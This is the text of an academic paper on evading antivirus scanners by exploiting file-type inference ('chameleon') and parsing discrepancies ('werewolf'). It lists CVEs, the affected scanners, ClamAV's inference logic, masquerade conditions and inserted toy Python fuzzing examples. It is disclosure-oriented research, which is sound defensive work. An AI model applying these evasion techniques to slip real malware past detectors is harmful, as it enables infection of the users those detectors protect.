Abusing File Processing in Malware Detectors for Fun and Profit
Suman Jana and Vitaly Shmatikov
The University of Texas at Austin

Abstract—We systematically describe two classes of evasion exploits against automated malware detectors. Chameleon attacks confuse the detectors' file-type inference heuristics, while werewolf attacks exploit discrepancies in format-specific file parsing between the detectors and actual operating systems and applications. These attacks do not rely on obfuscation, metamorphism, binary packing, or any other changes to malicious code. Because they enable even the simplest, easily detectable viruses to evade detection, we argue that file processing has become the weakest link of malware defense. Using a combination of manual analysis and black-box differential fuzzing, we discovered 45 new evasion exploits and tested them against 36 popular antivirus scanners, all of which proved vulnerable to various chameleon and werewolf attacks.
I. INTRODUCTION

Modern malware detectors employ a variety of detection techniques: scanning for instances of known viruses, binary reverse-engineering, behavioral analysis, and many others. Before any of these techniques can be applied to a suspicious file, however, the detector must (1) determine the type of the file, and (2) depending on the type, analyze the file's meta-data and parse the file: for example, extract the contents of an archive, find macros embedded in a document, or construct a contiguous view of executable code.

The importance of file processing grows as automated malware defense moves away from the host, with antivirus (AV) scanners and intrusion prevention systems installed at enterprise gateways and email servers, increasing popularity of cloud-based malware detection services, etc. Network- and cloud-based deployments protect multiple hosts, provide early detection capabilities and better visibility into network-wide trends, and make maintenance easier. To be effective, however, remotely deployed detectors must be able to predict how each file will be processed at its destination by the operating system and applications.

In this paper, we argue that the "semantic gap" between how malware detectors handle files and how the same files are processed on the end hosts is the Achilles heel of malware defense. We use the term detector generically for signature-based scanners, behavioral analyzers, or any other tool that parses and analyzes suspicious files on its own, independently of the destination end host. The vulnerabilities we describe are unrelated to obfuscation, mutation, or any other way of hiding malicious functionality. They enable even exact, unmodified instances of malware (primitive and otherwise trivially detectable, as well as arbitrarily sophisticated) to evade detection simply because the detector fails to correctly process the infected file.

We introduce two new classes of evasion exploits against malware detectors. The first is chameleon attacks, which target the discrepancies between the heuristics used by detectors to determine the type of the file and those used by the end hosts. Contrary to a common misconception, neither is based solely on the file extension; thus our attacks are more complex than simply renaming the extension (this trick does not work against modern detectors), nor can they be solved by forcing a particular extension onto a file. The second class is werewolf attacks, which exploit the discrepancies in the parsing of executables and application-specific formats between malware detectors and actual applications and operating systems.

We evaluated 36 popular AV scanners using a combination of manual analysis and differential black-box fuzzing, and discovered 45 different exploits. All tested scanners proved vulnerable to both chameleon and werewolf attacks.

We stress that the problem is not specific to AV scanners and does not depend on known weaknesses of signature-based scanning such as the inability to handle metamorphic mutations. The actual viruses used in our testing are extremely simple. They do not employ self-encryption, polymorphism, or obfuscation, yet chameleon and werewolf attacks enable them to pass undetected through scanners whose virus databases contain their exact code. Because file processing must take place before actual malware detection, more elaborate detectors are vulnerable, too, as long as their file-processing logic differs, however slightly, from the OS and applications on any of the protected end hosts.

The problem is deeper than the anecdotally known inability of AV software to properly process archive formats. Many modern file formats are effectively archives in disguise: for example, MS Office documents contain executable macros, Compiled HTML Help (CHM) contains HTML files, etc. We discovered chameleon and werewolf attacks against all file formats we tested, from relatively simple archives to executable images and complex MS Office document formats.

Evasion techniques based on code obfuscation are widely known and many defenses have been proposed. In contrast, our attacks involve changes only to the meta-data of infected files and are thus different, significantly simpler, and complementary to obfuscation-based evasion.

While each individual vulnerability may be easy to fix, file processing in malware detectors suffers from thousands of semantic discrepancies. It is very difficult to "write a better parser" that precisely replicates the file-parsing semantics of actual applications and operating systems: (1) many formats are underspecified, thus different applications process the same file in different and even contradictory ways, all of which must be replicated by the detector; (2) replicating the behavior of a given parser is hard: for example, after many years of testing, there are still hundreds of file-parsing discrepancies between OpenOffice and MS Office [23, 24] and between the "functionally equivalent" implementations of Unix utilities [7]; (3) the detector must be bug-compatible with all applications; (4) because applications are designed to handle even malformed files, their parsing algorithms are much looser than the format specification, change from version to version, and have idiosyncratic, difficult-to-replicate, mutually incompatible semantics for processing non-compliant files, all of which must be replicated by the detector; (5) even seemingly "safe" discrepancies, such as attempting to analyze files with invalid checksums when scanning an archive for malware, enable evasion.

Responsible disclosure. All attacks described in this paper have been reported to the public through the Common Vulnerabilities and Exposures (CVE) database.¹ In the rest of this paper, we refer to them by their candidate CVE numbers (see Tables I and II). These numbers were current at the time of writing, but may change in the future.
II. RELATED WORK

We introduce chameleon and werewolf attacks as a generic, pervasive problem in all automated malware detectors and demonstrate 45 distinct attacks on 36 different detectors, exploiting semantic gaps in their processing of many archive and non-archive formats. With a couple of exceptions (e.g., a RAR archive masquerading as a Windows executable, previously mentioned in [2]), the attacks in this paper are reported and described for the first time.

There is prior evidence of malformed archive files evading AV software [2, 3, 10, 18, 38, 39]. These anecdotes are limited to archive formats only and do not describe concrete attacks. Alvarez and Zoller briefly mention that modern AV scanners need to parse a variety of formats [2] and point out the importance of correct file parsing for preventing denial of service [1]. Concrete werewolf attacks on the detectors' parsing logic for non-archive formats such as executables and Office documents have been reported in neither research literature, nor folklore. These attacks have especially serious repercussions because they are not prevented even by host-based on-access scanning (see Section IX-A). Buffer overflow and other attacks on AV software, unrelated to file processing, are mentioned in [36, 37].

Chameleon attacks. Chameleon attacks on file-type inference heuristics are superficially similar to attacks on content-sniffing heuristics in Web browsers [19, 25, 30]. Barth et al. proposed prefix-disjoint content signatures as a browser-based defense against content-sniffing attacks [4]. The premise of this defense is that no file that matches the first few bytes of some format should be parsed as HTML regardless of its subsequent content. Prefix-disjoint signatures do not provide a robust defense against chameleon attacks on malware detectors. Detectors handle many more file formats than Web browsers and, crucially, these formats cannot be characterized solely by their initial bytes (e.g., valid TAR archives can have arbitrary content in their first 254 bytes, possibly including signatures for other file types). Therefore, they cannot be described completely by any set of prefix-disjoint signatures.

¹ http://cve.mitre.org/

Other semantic-gap attacks. Chameleon and werewolf attacks are an instance of a general class of "semantic-gap" attacks which exploit different views of the same object by the security monitor and the actual system. The gap described in this paper, the monitor's (mis)understanding of the type and structure of suspicious files, received much less attention than other evasion vectors against AV scanners and intrusion detection systems [16, 27, 31] and may very well be the weakest link of malware defense.

Other, complementary evasion techniques exploit networking protocols (e.g., split malware into multiple packets), obfuscate malware using mutation or packing [20], or, in the case of malicious JavaScript, obfuscate it in HTML, Flash, and PDF content. For example, Porst showed how to obfuscate scripts so that they are not recognized by AV scanners but parsed correctly by the Adobe reader [26]. HTML parsing is notoriously tricky [28], and cross-site scripting can exploit HTML-parsing discrepancies between browsers and sanitization routines [5, 35]. In contrast, we show how the most primitive viruses, which are present in standard virus databases and do not use any obfuscation, can evade detection by exploiting discrepancies in the processing of even basic file formats such as TAR and PE.

An entirely different kind of semantic gap is exploited by "split-personality" malware, whose behavior varies between monitored and unmonitored environments [8]. Such malware contains code that tries to detect virtualization, emulation, and/or instrumentation libraries. In contrast, our attacks are completely passive, require no active code whatsoever, and target a different feature of malware detection systems.

Semantic-gap attacks on system-call interposition exploit the gap between the monitor's and the OS's views of system-call arguments [12, 34]. These attacks typically involve concurrency and are fundamentally different from the attacks described in this paper.
Program differencing. Brumley et al. proposed to automatically detect discrepancies between different implementations of the same protocol specification by converting execution traces into symbolic formulas and comparing them using SMT solvers [6].

Table I. TESTED AV SCANNERS.

  AV no.  Name                   Version
  1       ClamAV                 0.96.4
  2       Rising                 22.83.00.03
  3       CAT-QuickHeal          11.00
  4       GData                  21
  5       Symantec               20101.3.0.103
  6       Command                5.2.11.5
  7       Ikarus                 T3.1.1.97.0
  8       Emsisoft               5.1.0.1
  9       PCTools                7.0.3.5
  10      F-Prot                 4.6.2.117
  11      VirusBuster            13.6.151.0
  12      Fortinent              4.2.254.0
  13      Antiy-AVL              2.0.3.7
  14      K7AntiVirus            9.77.3565
  15      TrendMicro-HouseCall   9.120.0.1004
  16      Kaspersky              7.0.0.125
  17      Jiangmin               13.0.900
  18      Microsoft              1.6402
  19      Sophos                 4.61.0
  20      NOD32                  5795
  21      AntiVir                7.11.1.163
  22      Norman                 6.06.12
  23      McAfee                 5.400.0.1158
  24      Panda                  10.0.2.7
  25      McAfee-GW-Edition      2010.1C
  26      TrendMicro             9.120.0.1004
  27      Comodo                 7424
  28      BitDefender            7.2
  29      eSafe                  7.0.17.0
  30      F-Secure               9.0.16160.0
  31      nProtect               2011-01-17.01
  32      AhnLab-V3              2011.01.18.00
  33      AVG                    10.0.0.1190
  34      Avast                  4.8.1351.0
  35      Avast5                 5.0.677.0
  36      VBA32                  3.12.14.2

Table II. AFFECTED AV SCANNERS FOR EACH REPORTED ATTACK (AV numbers refer to Table I).

  CVE-2012-1419: 1, 3
  CVE-2012-1420: 2, 3, 6, 10, 12, 14, 16, 18, 20, 22, 24
  CVE-2012-1421: 2, 3, 5, 22
  CVE-2012-1422: 2, 3, 20, 22
  CVE-2012-1423: 2, 6, 7, 8, 9, 10, 11, 12, 14, 20, 22
  CVE-2012-1424: 3, 9, 13, 17, 19, 22
  CVE-2012-1425: 3, 5, 7, 8, 9, 13, 15, 16, 17, 20, 21, 22, 23, 25, 26
  CVE-2012-1426: 2, 3, 6, 10, 14, 22
  CVE-2012-1427: 3, 19, 22
  CVE-2012-1428: 3, 19, 22
  CVE-2012-1429: 7, 8, 23, 25, 27, 28, 29, 30, 31
  CVE-2012-1430: 2, 19, 23, 25, 27, 28, 29, 30, 31
  CVE-2012-1431: 2, 6, 10, 19, 25, 27, 28, 29, 30, 31
  CVE-2012-1432: 7, 8, 24, 29
  CVE-2012-1433: 7, 8, 24, 29, 32
  CVE-2012-1434: 7, 8, 24, 32
  CVE-2012-1435: 7, 8, 24, 29, 32
  CVE-2012-1436: 7, 8, 24, 29, 32
  CVE-2012-1437: 27
  CVE-2012-1438: 19, 27
  CVE-2012-1439: 2, 24, 29
  CVE-2012-1440: 22, 24, 29
  CVE-2012-1441: 29
  CVE-2012-1442: 2, 3, 13, 16, 19, 23, 24, 25, 29, 30
  CVE-2012-1443: 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 32, 33, 34, 35, 36
  CVE-2012-1444: 24, 29
  CVE-2012-1445: 2, 24, 29
  CVE-2012-1446: 2, 3, 5, 9, 13, 16, 19, 22, 23, 24, 25, 29
  CVE-2012-1447: 24, 29
  CVE-2012-1448: 3, 7, 8, 26
  CVE-2012-1449: 2, 20
  CVE-2012-1450: 7, 8, 19
  CVE-2012-1451: 7, 8
  CVE-2012-1452: 3, 7, 8
  CVE-2012-1453: 2, 7, 8, 13, 15, 16, 18, 19, 23, 24, 25, 26
  CVE-2012-1454: 2, 23, 24, 25, 29
  CVE-2012-1455: 2, 20
  CVE-2012-1456: 2, 3, 5, 7, 8, 10, 12, 15, 16, 17, 19, 20, 22, 23, 24, 25, 26, 27, 29, 33
  CVE-2012-1457: 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 13, 14, 15, 16, 17, 18, 20, 21, 22, 23, 25, 26, 28, 29, 33, 34, 35, 36
  CVE-2012-1458: 1, 19
  CVE-2012-1459: 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 30, 31, 32, 33, 34, 35, 36
  CVE-2012-1460: 3, 6, 10, 13, 14, 17, 29, 36
  CVE-2012-1461: 2, 5, 6, 7, 8, 12, 14, 15, 16, 17, 19, 20, 22, 23, 25, 26, 28, 30, 33, 36
  CVE-2012-1462: 3, 5, 7, 8, 12, 16, 17, 19, 22, 29, 32, 33
  CVE-2012-1463: 3, 6, 10, 22, 23, 24, 27, 28, 29, 30, 31, 32
Unfortunately, this approach does not appear to be feasible for automatically discovering chameleon and werewolf attacks. The programs tested by Brumley et al. implement simple protocols like HTTP and their parsing code is very shallow, i.e., it lies close to the program's entry point. By contrast, malware scanners and applications do much more than parsing: scanners load virus signatures, match them against the file, etc., while applications perform a wide variety of operations before and after parsing. Binary differencing must be applied to the parsing code only, because the non-parsing functionalities of malware detectors and applications are completely different. This requires extracting the parsing code from the closed-source binaries of both detectors and applications, which is extremely difficult. Furthermore, both parsers must have the same interface, otherwise their final output states cannot be easily compared. Brumley et al. provide no method for automatically recognizing, extracting, normalizing, and comparing individual pieces of functionality hidden deep inside the binary. Furthermore, this technique generates formulas from one execution path at a time and is less likely to find bugs in rare paths. By contrast, most of the attacks reported in this paper (for example, the attack which concatenates two separate streams of gzipped data to create a single file) exploit bugs in unusual paths through the parsing code.

BEK is a new language and system for writing and analyzing string-manipulating sanitizers for Web applications [15]. BEK can compare two sanitizers for equivalence and produce a counter-example on which their outputs differ. The BEK language is specifically tailored for expressing string manipulation operations and is closely related to regular expressions. It is ill-suited for expressing file-parsing logic. For example, it cannot validate data-length fields in file headers and similar content-dependent format fields.

Development of program analysis techniques for automated discovery of chameleon and werewolf attacks is an interesting topic for future research.
III. ATTACKING FILE PROCESSING

Figure 1 shows the main components of the file-processing logic of antivirus scanners. The basic pattern applies to other automated malware detectors,² both behavioral and signature-based, as long as they process files independently of the end host's OS and applications.

Figure 1. File processing in antivirus scanners. (Pipeline: input file; file-type inference; file parsing, consisting of preprocessing and normalization and selecting the parts to scan; signature matching, consisting of finding the relevant signatures and matching them.)

The first step is file-type inference. The scanner must infer the file type in order to (1) parse the file correctly and (2) scan it for the correct subset of virus signatures.

The second step is file parsing. Files in some formats must be preprocessed before scanning (for example, the contents of an archive must be extracted). Documents in formats like HTML contain many irrelevant characters (for example, whitespace) and must be normalized. In most file formats, whether executable or application-specific, blocks of data are interspersed with meta-data. For higher performance, malware scanners parse the meta-data in order to identify and scan only the potentially "interesting" parts of the file. For example, a scanner may parse an MS Word document to find embedded macros and other executable objects and scan them for macro viruses. To detect viruses in Linux ELF executables, which can contain multiple sections, the scanner must construct a contiguous view of the executable code. This requires parsing the meta-data (ELF header) to find the offsets and sizes of code sections.

Chameleon and werewolf attacks. We will refer to attacks that exploit discrepancies in file-type inference as chameleon attacks because attack files appear as one type to the detector and as a different type to the actual OS or application. We will refer to attacks that exploit discrepancies in parsing as werewolf attacks because attack files appear to have different structure depending on whether they are parsed by the detector or the application.

Chameleon and werewolf attacks only change the meta-data of the file; the contents, including the malicious payload, are not modified (in contrast to code obfuscation and polymorphism). These attacks (1) start with a file that is recognized as malicious by the detector, (2) turn it into a file that is not recognized as malicious, yet (3) the modified file is correctly processed by the destination application or, in the case of executables, loaded by the OS. If the same file can be processed by multiple applications or versions of the same application, we consider an attack successful if at least one of them processes the modified file correctly.

Fingerprinting malware detectors and learning their logic. Because file-type inference heuristics and file-parsing logic vary from detector to detector, attacks are detector-specific and it helps to know which detector is protecting the target. This knowledge is often public (for example, Yahoo Mail scans all messages with Symantec's Norton antivirus), but even in blind testing against Gmail's unknown scanner, two chameleon and one werewolf attacks (CVE-2012-1438, 2012-1443, and 2012-1457) evaded detection. Unknown detectors can be identified by tell-tale signs in bounced messages [22], or by using chameleon and werewolf attacks themselves. As Table II shows, different attacks work against different detectors. By trying several attacks and seeing which of them evade detection, the attacker can infer the make and model of the detector.

The logic of open-source detectors like ClamAV can be learned by analyzing their code, but the vast majority of detectors are closed-source and their logic must be learned by fuzzing and/or binary analysis. Secrecy of the file-processing logic is a weak defense, however: we report dozens of vulnerabilities in commercial scanners for which we do not have the source code, many of them discovered automatically by our black-box differential fuzzer.

² Human operators may be able to manually prevent incorrect parsing and file-type inference, but widespread deployment of human-assisted detectors is not feasible for obvious scalability reasons.
IV. GENERATING ATTACKS

To test our attacks, we used VirusTotal [32], a free Web service that checks any file against multiple antivirus scanners (43 at the time of our testing). Several scanners were not available at various times due to crashes, thus for consistency we present the results for the 36 scanners that were continuously available.

VirusTotal executes the command-line versions of all AV scanners with maximum protection and all detection methods enabled. We argue that this faithfully models the level of defense provided by network-based detectors. By design, they do not observe the actual processing of files on the host, and thus advanced detection techniques (for example, monitoring the program's execution for signs of malicious behavior) require the detector to accurately recognize the file type, parse the file, and replicate the host's execution environment. In Section IX, we explain why this is challenging to do correctly. Attacks were also confirmed by testing against the host-based versions of AV software, where available.

Table III. TESTED APPLICATIONS.

  File type  Target application(s)
  CAB        Cabextract 1.2
  CHM        Microsoft HTML Help 1.x
  ELF        Linux kernel (2.6.32) ELF loader
  GZIP       Gzip 1.3.12, FileRoller 2.30.1.1
  DOC        MS Office 2007, OpenOffice 3.2
  PE         Windows Vista SP2 PE loader, Wine 1.2.2 PE loader
  RAR        RAR 3.90 beta 2
  TAR        GNU tar 1.22, FileRoller 2.30.1.1
  7Z         7-Zip 9.04 beta

We used five toy viruses from VX Heavens [33] in our tests: EICAR, Linux Bliss and Cassini, Windows Cecile, and MS Word ABC. If an exact, unobfuscated instance of such a basic virus evades detection, more sophisticated malware won't be detected, either. We count an attack as successful if the detector (1) recognizes the infection in the original file, but (2) no longer recognizes it in the modified file.

Target applications used in our testing are summarized in Table III. They were executed on laptops running Linux Ubuntu 10.04 and Windows Vista SP2.

Black-box differential fuzzing. To find werewolf attacks automatically, we built a differential fuzzing framework that finds discrepancies between the parsing logic of applications and malware detectors. Because the source code of detectors is rarely available, our framework is black-box. It is implemented in Python and runs on both Linux and Windows. The basic framework is format-independent, but format-specific components are added as plugins. Each plugin provides a parser, an output validator, and a fuzzer. The parser breaks up the format-specific header into an array of (name, offset, length) tuples, where name is the unique name of a header field, offset is its location in the file, and length is its size. The fuzzer modifies the content of the fields using a format-specific algorithm. The validator checks if the application still processes the modified file correctly.

Our framework takes as input two seed files in the same format. One file is parsed correctly by the destination application, the other is an infected file recognized by the detector. The framework uses the format-specific fuzzer to automatically generate modifications to the first file and the output validator to check if the application still accepts the file. If a modification is validated, the framework applies it to the second, infected file and tests whether the detector still recognizes the infection.

This approach is better than directly modifying the infected file and accessing it on an end host because (1) the host must be isolated (e.g., virtualized) in each test to prevent an actual infection, imposing a significant performance overhead on the testing framework, and (2) determining if the modified infected file is accepted by the destination application is difficult because applications are opaque and have complex side effects. A modification is thus applied to the infected file only if the application's parser tolerates it. If the file is no longer recognized as malicious, a discrepancy between the application's and the detector's parsers has been found and an actual attack can be generated and verified by accessing the modified infected file on a secure, isolated host. We consider an infection verified if the intact malware code is extracted from the archive and/or loaded as an executable.

As a proof of concept, we implemented sample plugins for MS Cabinet (CAB), Windows executable (PE), and Linux executable (ELF) files. The fuzzer in these plugins tries a simple modification to the file's header, one field at a time: it increments the content of each field (or the first byte if the field spans multiple bytes) by 1; if this results in an overflow, it decrements the content by 1. Output validators execute destination applications on modified seed files and check the return codes and the application's output for correctness. Once integrated with VirusTotal, our fuzzing framework found dozens of parsing bugs in 21 different detectors (Table XII). All result in actual werewolf attacks.

Of course, our simple framework cannot find all parsing discrepancies. Some parsing bugs are hidden in rarely executed paths which can only be reached through specially crafted inputs, requiring manual guidance to the fuzzer. For example, attacks involving a concatenation of two gzipped streams or a header with an incorrect checksum whose length is modified to point into the following header (see Section VI) are difficult to discover by automated fuzzing. Another limitation is that our fuzzer does not fully "understand" the dependencies between different fields of format-specific headers and cannot automatically generate valid files if several fields must be changed consistently. For example, if file length is included in a header field, the file must be truncated or augmented whenever this field is modified.
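The following is an added example illustrating the plugin structure and the field-by-field mutation just described; it is not the authors' framework. The real framework drove the actual applications and VirusTotal as black boxes; here both sides are stand-in models written for the example: `application_accepts` is a simplified approximation of the handful of header checks a Linux ELF loader performs (an assumption), and `detector_accepts` is a hypothetical strict detector that also insists on the spec-mandated values of the identification bytes and `e_version`. The seed header is constructed inline. Every field whose mutation the application tolerates but the detector rejects is a werewolf candidate, which is the same discrepancy class Table XII reports for the ELF `class`, `encoding`, `abi`, `abiversion`, `padding` and `eversion` fields.

```python
"""Toy black-box differential fuzzer over ELF64 header fields.
Added example; both parsers are simplified models, not real code."""
import struct

# (name, offset, length) tuples for the ELF64 header, as the plugin parser
# described in the text would produce them (offsets from the ELF spec).
ELF64_HEADER_FIELDS = [
    ("ei_mag", 0, 4), ("ei_class", 4, 1), ("ei_data", 5, 1),
    ("ei_version", 6, 1), ("ei_osabi", 7, 1), ("ei_abiversion", 8, 1),
    ("ei_pad", 9, 7), ("e_type", 16, 2), ("e_machine", 18, 2),
    ("e_version", 20, 4), ("e_entry", 24, 8), ("e_phoff", 32, 8),
    ("e_shoff", 40, 8), ("e_flags", 48, 4), ("e_ehsize", 52, 2),
    ("e_phentsize", 54, 2), ("e_phnum", 56, 2), ("e_shentsize", 58, 2),
    ("e_shnum", 60, 2), ("e_shstrndx", 62, 2),
]


def make_seed_header():
    """Constructed sample: a minimal, well-formed x86-64 ET_EXEC header."""
    ident = b"\x7fELF" + bytes([2, 1, 1, 0, 0]) + b"\0" * 7
    rest = struct.pack("<HHIQQQIHHHHHH", 2, 0x3E, 1, 0x401000, 64, 0, 0,
                       64, 56, 1, 64, 0, 0)
    return ident + rest


def application_accepts(hdr):
    """Assumed model of the kernel loader: magic, e_type, e_machine and
    e_phentsize are checked; the remaining header bytes are not looked at."""
    if hdr[:4] != b"\x7fELF":
        return False
    e_type, e_machine = struct.unpack_from("<HH", hdr, 16)
    e_phentsize = struct.unpack_from("<H", hdr, 54)[0]
    return e_type in (2, 3) and e_machine == 0x3E and e_phentsize == 56


def detector_accepts(hdr):
    """Hypothetical strict detector: rejects anything the spec calls invalid,
    so it is stricter than the loader it is supposed to mirror."""
    if not application_accepts(hdr):
        return False
    e_version = struct.unpack_from("<I", hdr, 20)[0]
    return (hdr[4] == 2 and hdr[5] == 1 and hdr[6] == 1 and hdr[7] == 0
            and hdr[8] == 0 and hdr[9:16] == b"\0" * 7 and e_version == 1)


def mutate_field(data, offset):
    """The paper's mutation: +1 on the field's first byte, -1 on overflow."""
    buf = bytearray(data)
    buf[offset] = buf[offset] + 1 if buf[offset] < 0xFF else buf[offset] - 1
    return bytes(buf)


def find_discrepancies(seed, fields):
    """Names of fields whose mutation the application still accepts but the
    detector rejects: each one is a werewolf-attack candidate."""
    hits = []
    for name, offset, _length in fields:
        mutated = mutate_field(seed, offset)
        if application_accepts(mutated) and not detector_accepts(mutated):
            hits.append(name)
    return hits


if __name__ == "__main__":
    for field in find_discrepancies(make_seed_header(), ELF64_HEADER_FIELDS):
        print("discrepancy in", field)
```

With real targets, `application_accepts` would run the loader (or `cabextract`, the PE loader, and so on) on the mutated benign seed and inspect its exit code and output, exactly as the paper's output validators do, and only validated mutations would be replayed onto the infected seed and submitted to the detector.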
V. CHAMELEON ATTACKS

Chameleon attacks involve specially crafted files that appear as one type to the file-type inference heuristics used by the malware detector but as a different type to the OS or application on the end host.

The simplest chameleon attack is to hide the infected file in an archive of a type not recognized by the detector, causing it to apply generic malware signatures without extracting the contents. Even this primitive attack is surprisingly effective, as shown by Table IV.

In the rest of this section, we focus on more interesting chameleon attacks that involve a file of one type masquerading as a file of a different type.
Table IV. SUPPORT FOR 11 ARCHIVE FORMATS: 7ZIP, 7ZIP-SFX, PACK, ISO, RAR, RAR (SFX), TAR.LZOP, TAR.LZMA, TAR.RZ, TAR.XZ, AR. The second column gives the number of these 11 formats the scanner does not support.

  Scanner                             Unsupported formats
  ClamAV 0.96.4                       8
  Rising 22.83.00.03                  9
  CAT-QuickHeal 11.00                 9
  GData 21                            7
  Symantec 20101.3.0.103              10
  Command 5.2.11.5                    8
  Ikarus T3.1.1.97.0                  9
  Emsisoft 5.1.0.1                    8
  PCTools 7.0.3.5                     10
  F-Prot 4.6.2.117                    9
  VirusBuster 13.6.151.0              10
  Fortinent 4.2.254.0                 9
  Antiy-AVL 2.0.3.7                   8
  K7AntiVirus 9.77.3565               9
  TrendMicro-HouseCall 9.120.0.1004   10
  Kaspersky 7.0.0.125                 5
  Jiangmin 13.0.900                   9
  Microsoft 1.6402                    6
  Sophos 4.61.0                       8
  NOD32 5795                          7
  AntiVir 7.11.1.163                  7
  Norman 6.06.12                      9
  McAfee 5.400.0.1158                 10
  Panda 10.0.2.7                      8
  McAfee-GW-Edition 2010.1C           10
  TrendMicro 9.120.0.1004             10
  Comodo 7424                         11
  BitDefender 7.2                     9
  eSafe 7.0.17.0                      8
  F-Secure 9.0.16160.0                8
  nProtect 2011-01-17.01              10
  AhnLab-V3 2011.01.18.00             10
  AVG 10.0.0.1190                     9
  Avast 4.8.1351.0                    7
  Avast5 5.0.677.0                    7
  VBA32 3.12.14.2                     9

Masquerade attacks cause harm in several ways.
First, for efficiency, detectors usually apply only a subset of analysis techniques and/or malware signatures to any given file type. If the detector is confused about the type, it may apply a wrong analysis. Second, many file types require preprocessing (e.g., unpacking) before they can be analyzed. A confused detector may apply a wrong preprocessing or no preprocessing at all.

File-type inference heuristics. File-type inference in malware scanners is not based on the file extension. Even if the end host runs Windows, which by default relies on the extension to determine the file's type, users may override the defaults and use any program to open any file. Therefore, all tested scanners ignore the extension and attempt to determine the actual type of the file. The simple attack of renaming the extension thus does not work, but neither does the simple defense of having the scanner rewrite the extension to match the file's actual type (see Section VII).

To illustrate file-type inference heuristics, we use ClamAV v0.95.2, a popular open-source scanner [9]. The basic principles apply to other detectors, too, as evidenced by the success of chameleon attacks against all of them. For most file types, ClamAV uses fixed-offset byte-string signatures, but for certain types such as HTML or self-extracting ZIP archives, ClamAV also uses regular-expression signatures, described later in this section.

Fixed-offset signatures are tuples of the form (offset, magic-content, length) where offset denotes the offset from the beginning of the file which is to be checked for this particular file type, magic-content is the sequence of bytes starting from offset that any file of this type should have, and length is the length (in bytes) of that sequence. Some of ClamAV's file-type signatures are shown in Table XIII in the appendix. For example, ClamAV's signature for ELF executables is (0, 7f454c46, 4), thus any file which has 7f454c46 as its first four bytes will be considered as an ELF file by ClamAV.

Algorithm 1 shows a simplified version of ClamAV's algorithm for inferring the file type. The order of signatures in the list matters: once ClamAV finds a match, it does not check the list any further. In particular, if a fixed-offset signature is matched, all regex signatures are ignored. This is exploited by one of our attacks.

Algorithm 1. Simplified pseudocode of ClamAV's file-type inference algorithm.

  Read first 1024 bytes of input file into buf
  for each fixed-offset file-type signature s, in the specified order, do
    if !memcmp(buf + s.offset, s.magic-content, s.length) then
      if s is a file type to ignore then
        return ignore
      else
        return s.filetype
      end if
    end if
  end for
  Check buf for regex file-type signatures using the Aho-Corasick algorithm
  if buf matches a regex signature r then
    return r.filetype
  else
    return unknown file type
  end if

From version 0.96 onward, ClamAV also supports LLVM bytecode signatures, typically used to detect polymorphic malware in a file-format-aware manner. These signatures are only checked for specific file types, e.g., a signature registering PDF_HOOK_DECLARE will only get checked if the inferred file type is PDF. Therefore, these signatures are extremely susceptible to chameleon attacks.
Requirements for file-type masquerade. Let A be the file's actual type and let B be the fake type that the attacker wants the detector to infer. For the masquerade to be successful, three conditions must hold for the file-type signatures S_A (for type A) and S_B (for type B):

  1) S_A and S_B do not conflict, i.e., there are no i, j such that 0 ≤ i < S_A.length, 0 ≤ j < S_B.length, S_A.offset + i = S_B.offset + j, and S_A.magic-content[i] ≠ S_B.magic-content[j].
  2) The detector matches S_B before S_A.
  3) The destination OS or application correctly processes files of type A containing both S_A and S_B.

The first condition ensures that the same file may contain both S_A and S_B, the second that the detector infers type B for the file before it has a chance to infer type A. In our testing, we discovered 12 file-type pairs that satisfy all three conditions for ClamAV (Table V).

Table V. VULNERABLE FILE-TYPE PAIRS IN CLAMAV.

  Real type   Fake type
  POSIX TAR   mirc.ini
  ELF         POSIX TAR
  PNG         POSIX TAR
  ELF         JPEG
  GIF         JPEG
  ELF         SIS
  BMP         JPEG
  MPEG        POSIX TAR
  MP3         POSIX TAR
  JPEG        POSIX TAR
  PNG         JPEG
  BMP         JPEG
Masquerade alone is not enough. Even if the detector infers the wrong file type, it may still detect the infection by scanning the file as a "blob" or if the signatures associated with the inferred type contain the virus. That said, masquerade is a good start for exploring chameleon attacks.
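Conditions (1) and (2) above can be checked mechanically against a detector's ordered signature list. The following is an added example, not the authors' code; the signature table is a constructed four-entry excerpt (the ELF and mirc.ini magics are the ones quoted in the text, the `ustar` magic at offset 257 is the POSIX TAR signature, `PK\x03\x04` is the ZIP signature) and its order is an assumption made for the example, not ClamAV's actual order. Condition (3), that the real application still accepts a file carrying both magics, has to be tested against the application itself and is outside what this code can decide.

```python
"""Enumerating file-type masquerade candidates from an ordered signature
list: pairs (real, fake) whose magics do not conflict (condition 1) and
where the fake type is checked first (condition 2). Added example."""

# (filetype, offset, magic), in the order the detector is assumed to check them
SIGNATURES = [
    ("mirc.ini", 0, b"[aliases]"),
    ("ELF", 0, b"\x7fELF"),
    ("ZIP", 0, b"PK\x03\x04"),
    ("POSIX TAR", 257, b"ustar"),
]


def signatures_conflict(sig_a, sig_b):
    """Condition (1): True if the two magics demand different bytes at some
    common file offset, so that no single file can carry both."""
    _, off_a, magic_a = sig_a
    _, off_b, magic_b = sig_b
    for i, byte_a in enumerate(magic_a):
        j = off_a + i - off_b          # index into magic_b at the same file offset
        if 0 <= j < len(magic_b) and magic_b[j] != byte_a:
            return True
    return False


def matched_before(real, fake, order):
    """Condition (2): the detector reaches the fake type's signature first."""
    names = [name for name, _, _ in order]
    return names.index(fake) < names.index(real)


def masquerade_candidates(order):
    """All (real, fake) type pairs satisfying conditions (1) and (2)."""
    pairs = []
    for real in order:
        for fake in order:
            if real is fake:
                continue
            if (not signatures_conflict(real, fake)
                    and matched_before(real[0], fake[0], order)):
                pairs.append((real[0], fake[0]))
    return pairs


if __name__ == "__main__":
    for real, fake in masquerade_candidates(SIGNATURES):
        print(f"{real} can masquerade as {fake}")
```

With this ordering the only non-conflicting pairs are those where the real type is POSIX TAR: its magic lives at offset 257, so any of the offset-0 magics can be placed in the first member's name field without touching it, which is exactly the pattern behind the TAR rows of Table VI. Every pair of offset-0 magics conflicts on their first byte and is rejected.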
Table VI. CHAMELEON ATTACKS WITH EICAR-INFECTED TAR FILES.

  Actual file type  Fake file type  No. of vulnerable AVs  CVE
  POSIX TAR         mirc.ini        2                      2012-1419
  POSIX TAR         ELF             11                     2012-1420
  POSIX TAR         CAB             4                      2012-1421
